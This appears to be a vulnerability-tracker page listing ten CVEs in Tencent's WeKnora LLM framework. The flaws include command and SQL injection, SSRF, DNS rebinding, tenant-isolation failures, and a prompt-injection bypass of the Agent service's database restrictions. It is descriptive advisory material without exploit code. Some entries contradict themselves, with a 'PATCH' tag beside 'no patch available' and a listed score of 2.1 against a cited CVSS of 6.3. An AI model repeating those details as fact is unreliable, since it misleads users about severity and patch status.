Skip to main content

Weknora

10 CVEs product

Monthly

CVE-2026-8786 LOW POC Monitor

Authorization bypass in Tencent WeKnora's Config API endpoint allows authenticated attackers to access unauthorized knowledge bases by manipulating the kbId parameter in getKnowledgeBaseForInitialization function. Affects all versions up to 0.3.6. Publicly available exploit code exists via GitHub Gist, enabling low-complexity attacks with network access. CVSS 6.3 reflects moderate impact across confidentiality, integrity, and availability. EPSS data not available, but public POC increases exploitation likelihood. Vendor unresponsive to disclosure, indicating no official patch timeline.

Authentication Bypass Weknora
NVD VulDB GitHub
CVSS 4.0
2.1
EPSS
0.0%
CVE-2026-30861 Go CRITICAL POC PATCH Act Now

OS command injection in WeKnora from version 0.2.5 allows authenticated users to execute arbitrary system commands. CVSS 9.9 with scope change. PoC available.

RCE Command Injection AI / ML Weknora Suse
NVD GitHub
CVSS 3.1
9.9
EPSS
0.2%
CVE-2026-30860 Go CRITICAL POC PATCH Act Now

SQL injection in WeKnora LLM document understanding framework allows authenticated users to extract arbitrary database contents. CVSS 9.9 with scope change. PoC available.

PostgreSQL RCE SQLi AI / ML Weknora +1
NVD GitHub
CVSS 3.1
9.9
EPSS
0.2%
CVE-2026-30859 Go MEDIUM PATCH This Month

WeKnora versions prior to 0.2.12 suffer from inadequate tenant isolation in database queries, permitting any authenticated user to access sensitive data from other tenants including API keys, model configurations, and private messages. The vulnerability affects multi-tenant deployments where account-level access controls fail to prevent cross-tenant data exfiltration. No patch is currently available for affected versions.

Authentication Bypass Information Disclosure AI / ML Weknora Suse
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-30858 Go MEDIUM POC PATCH This Month

DNS rebinding in WeKnora's web_fetch tool allows authenticated attackers to bypass URL validation and access internal resources and private IP addresses on the server through malicious domains that resolve differently during validation versus execution. Public exploit code exists for this vulnerability, and versions prior to 0.3.0 are affected with no patch currently available. An attacker could leverage this to access sensitive local services and exfiltrate data from the affected system.

DNS AI / ML Weknora Suse
NVD GitHub
CVSS 3.1
6.5
EPSS
0.1%
CVE-2026-30857 Go MEDIUM POC PATCH This Month

Weknora versions up to 0.3.0 is affected by authorization bypass through user-controlled key (CVSS 5.3).

Authentication Bypass AI / ML Weknora Suse
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-30855 Go HIGH POC PATCH This Week

Insufficient authorization checks in WeKnora's tenant management endpoints allow any authenticated user to read, modify, or delete arbitrary tenants, with public exploit code available. Since the application allows open registration, unauthenticated attackers can register an account and exploit this flaw to perform cross-tenant account takeover and data destruction. No patch is currently available for this high-severity vulnerability affecting WeKnora AI/ML framework versions prior to 0.3.2.

Authentication Bypass AI / ML Weknora Suse
NVD GitHub
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-30247 Go MEDIUM POC PATCH This Month

WeKnora's document import feature is vulnerable to Server-Side Request Forgery through HTTP redirects, allowing unauthenticated remote attackers to bypass URL validation controls and access internal services despite backend protections against private IPs and metadata endpoints. The vulnerability affects WeKnora versions prior to 0.2.12 when deployed in Docker environments, where host.docker.internal addresses are not blocked. Public exploit code exists and no patch is currently available.

Docker SSRF AI / ML Weknora Suse
NVD GitHub
CVSS 3.1
5.9
EPSS
0.0%
CVE-2026-22688 Go CRITICAL POC PATCH Act Now

WeKnora LLM framework (before 0.2.5) allows authenticated users to inject MCP stdio commands that the server executes as subprocesses. PoC available, patch available.

Command Injection AI / ML Weknora Suse
NVD GitHub
CVSS 3.1
9.9
EPSS
0.3%
CVE-2026-22687 Go MEDIUM POC PATCH This Month

WeKnora versions before 0.2.5 allow unauthenticated attackers to bypass database query restrictions through prompt injection techniques when the Agent service is enabled, enabling unauthorized access to sensitive data. Public exploit code exists for this vulnerability, which affects the framework's document understanding and semantic retrieval capabilities. A patch is available in version 0.2.5 and later.

SQLi AI / ML Weknora Suse
NVD GitHub
CVSS 3.1
5.6
EPSS
0.1%
EPSS 0% CVSS 2.1
LOW POC Monitor

Authorization bypass in Tencent WeKnora's Config API endpoint allows authenticated attackers to access unauthorized knowledge bases by manipulating the kbId parameter in getKnowledgeBaseForInitialization function. Affects all versions up to 0.3.6. Publicly available exploit code exists via GitHub Gist, enabling low-complexity attacks with network access. CVSS 6.3 reflects moderate impact across confidentiality, integrity, and availability. EPSS data not available, but public POC increases exploitation likelihood. Vendor unresponsive to disclosure, indicating no official patch timeline.

Authentication Bypass Weknora
NVD VulDB GitHub
EPSS 0% CVSS 9.9
CRITICAL POC PATCH Act Now

OS command injection in WeKnora from version 0.2.5 allows authenticated users to execute arbitrary system commands. CVSS 9.9 with scope change. PoC available.

RCE Command Injection AI / ML +2
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL POC PATCH Act Now

SQL injection in WeKnora LLM document understanding framework allows authenticated users to extract arbitrary database contents. CVSS 9.9 with scope change. PoC available.

PostgreSQL RCE SQLi +3
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

WeKnora versions prior to 0.2.12 suffer from inadequate tenant isolation in database queries, permitting any authenticated user to access sensitive data from other tenants including API keys, model configurations, and private messages. The vulnerability affects multi-tenant deployments where account-level access controls fail to prevent cross-tenant data exfiltration. No patch is currently available for affected versions.

Authentication Bypass Information Disclosure AI / ML +2
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM POC PATCH This Month

DNS rebinding in WeKnora's web_fetch tool allows authenticated attackers to bypass URL validation and access internal resources and private IP addresses on the server through malicious domains that resolve differently during validation versus execution. Public exploit code exists for this vulnerability, and versions prior to 0.3.0 are affected with no patch currently available. An attacker could leverage this to access sensitive local services and exfiltrate data from the affected system.

DNS AI / ML Weknora +1
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM POC PATCH This Month

Weknora versions up to 0.3.0 is affected by authorization bypass through user-controlled key (CVSS 5.3).

Authentication Bypass AI / ML Weknora +1
NVD GitHub
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

Insufficient authorization checks in WeKnora's tenant management endpoints allow any authenticated user to read, modify, or delete arbitrary tenants, with public exploit code available. Since the application allows open registration, unauthenticated attackers can register an account and exploit this flaw to perform cross-tenant account takeover and data destruction. No patch is currently available for this high-severity vulnerability affecting WeKnora AI/ML framework versions prior to 0.3.2.

Authentication Bypass AI / ML Weknora +1
NVD GitHub
EPSS 0% CVSS 5.9
MEDIUM POC PATCH This Month

WeKnora's document import feature is vulnerable to Server-Side Request Forgery through HTTP redirects, allowing unauthenticated remote attackers to bypass URL validation controls and access internal services despite backend protections against private IPs and metadata endpoints. The vulnerability affects WeKnora versions prior to 0.2.12 when deployed in Docker environments, where host.docker.internal addresses are not blocked. Public exploit code exists and no patch is currently available.

Docker SSRF AI / ML +2
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL POC PATCH Act Now

WeKnora LLM framework (before 0.2.5) allows authenticated users to inject MCP stdio commands that the server executes as subprocesses. PoC available, patch available.

Command Injection AI / ML Weknora +1
NVD GitHub
EPSS 0% CVSS 5.6
MEDIUM POC PATCH This Month

WeKnora versions before 0.2.5 allow unauthenticated attackers to bypass database query restrictions through prompt injection techniques when the Agent service is enabled, enabling unauthorized access to sensitive data. Public exploit code exists for this vulnerability, which affects the framework's document understanding and semantic retrieval capabilities. A patch is available in version 0.2.5 and later.

SQLi AI / ML Weknora +1
NVD GitHub

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy